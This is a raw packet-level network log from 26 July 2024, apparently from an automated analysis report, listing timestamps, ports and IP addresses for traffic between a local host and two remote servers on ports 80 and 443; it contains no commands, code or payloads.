Jul 26, 2024 12:57:37.648180008 CEST	60822	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:37.661906958 CEST	80	60822	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:37.661976099 CEST	80	60819	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:37.662116051 CEST	60822	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:37.662127972 CEST	60819	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:37.662167072 CEST	60822	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:37.667618036 CEST	80	60822	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:37.915491104 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.915540934 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.915561914 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.915663004 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:37.915735006 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.915760040 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:37.915823936 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:37.955682039 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.955719948 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.955889940 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:37.955890894 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:37.955955029 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.956011057 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.015587091 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.015652895 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.015805960 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.015805960 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.015871048 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.015933037 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.035629988 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.035677910 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.035815954 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.035815954 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.035841942 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.035902023 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.069483995 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.069534063 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.069600105 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.069663048 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.069705009 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.069771051 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.069771051 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.069935083 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.069936037 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.349653006 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.349741936 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.349850893 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.350070000 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.350106955 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.381664038 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:38.381728888 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:38.447453022 CEST	80	60822	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:38.447894096 CEST	60822	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:38.448508978 CEST	60822	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:38.460457087 CEST	80	60822	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:38.708005905 CEST	80	60822	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:38.708509922 CEST	60822	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:38.819967031 CEST	60822	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:38.820310116 CEST	60824	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:38.825488091 CEST	80	60824	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:38.825588942 CEST	60824	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:38.825697899 CEST	60824	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:38.825877905 CEST	80	60822	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:38.825938940 CEST	60822	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:38.830717087 CEST	80	60824	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:39.040750027 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.040939093 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.041686058 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.041712999 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.043899059 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.043910980 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.490075111 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.490134001 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.490154028 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.490195990 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.490206957 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.490235090 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.490255117 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.490288019 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.507316113 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.507359028 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.507412910 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.507467985 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.507508993 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.507530928 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.574748039 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.574807882 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.574882030 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.574907064 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.574954987 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.574954987 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.594906092 CEST	80	60824	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:39.595014095 CEST	60824	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:39.595582008 CEST	60824	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:39.602430105 CEST	80	60824	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:39.607404947 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.607450962 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.607523918 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.607541084 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.607574940 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.607597113 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.644222021 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.644268990 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.644396067 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.644413948 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.644470930 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.673635960 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.673679113 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.673749924 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.673764944 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.673799992 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.673820972 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.689423084 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.689464092 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.689533949 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.689544916 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.689585924 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.690819979 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.705404043 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.705449104 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.705501080 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.705513954 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.705552101 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.705552101 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.731827021 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.731868029 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.731923103 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.731935978 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.731969118 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.731990099 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.744328022 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.744369984 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.744414091 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.744425058 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.744451046 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.744471073 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.755166054 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.755208969 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.755255938 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.755273104 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.755300045 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.755320072 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.769573927 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.769614935 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.769651890 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.769663095 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.769692898 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.769712925 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.782073021 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.782123089 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.782191992 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.782202959 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.782233953 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.782252073 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.791337967 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.791379929 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.791415930 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.791425943 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.791455030 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.791472912 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.801616907 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.801659107 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.801702023 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.801712990 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.801740885 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.801759005 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.812596083 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.812638044 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.812675953 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.812688112 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.812726021 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.812746048 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.824867010 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.824913025 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.824950933 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.824970961 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.824995995 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.825020075 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.836874962 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.836922884 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.836956978 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.836971045 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.836997986 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.837014914 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.846085072 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.846124887 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.846157074 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.846167088 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.846190929 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.846210003 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.849438906 CEST	80	60824	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:39.849514008 CEST	60824	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:39.863765955 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.863818884 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.863853931 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.863867044 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.863892078 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.863909960 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.875461102 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.875503063 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.875540018 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.875550985 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.875577927 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.875595093 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.885548115 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.885590076 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.885621071 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.885633945 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.885658979 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.885678053 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.894737005 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.894778013 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.894824028 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.894834995 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.894860029 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.894881010 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.904021978 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.904042006 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.904108047 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.904153109 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.904206038 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.918673992 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.918687105 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.918787003 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.918813944 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.918865919 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.938518047 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.938534021 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.938730001 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.938744068 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.938797951 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.945312023 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.945327044 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.945403099 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.945415020 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.945460081 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.956861019 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.956876040 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.956964016 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.956999063 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.957045078 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.966536045 CEST	60824	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:39.966819048 CEST	60825	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:39.973392963 CEST	80	60825	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:39.973479033 CEST	60825	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:39.973567009 CEST	60825	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:39.978612900 CEST	80	60825	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:39.982342958 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.982363939 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.982439995 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.982469082 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.982515097 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.984822989 CEST	80	60824	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:39.984877110 CEST	60824	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:39.986756086 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.986768961 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.986939907 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.986958981 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.987010956 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.990124941 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.990138054 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.990200996 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.990219116 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.990263939 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.996412992 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.996428013 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.996512890 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:39.996542931 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:39.996586084 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.010647058 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.010659933 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.010746002 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.010761023 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.010809898 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.022228003 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.022243023 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.022326946 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.022351027 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.022403002 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.035293102 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.035310030 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.035381079 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.035407066 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.035460949 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.049201012 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.049216986 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.049292088 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.049324036 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.049366951 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.066183090 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.066196918 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.066262960 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.066272974 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.066314936 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.072125912 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.072140932 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.072194099 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.072201014 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.072238922 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.080262899 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.080279112 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.080347061 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.080358982 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.080405951 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.088057995 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.088073015 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.088120937 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.088145018 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.088176012 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.088198900 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.102663040 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.102677107 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.102724075 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.102742910 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.102776051 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.102794886 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.115153074 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.115165949 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.115223885 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.115236044 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.115288019 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.403918028 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.403928995 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.404017925 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.404037952 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.404115915 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.404189110 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.404189110 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.407625914 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.407639980 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.407819033 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.407841921 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.407907963 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:40.411257982 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.411273003 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:40.411340952 CEST	60823	443	192.168.2.6	5.75.212.60
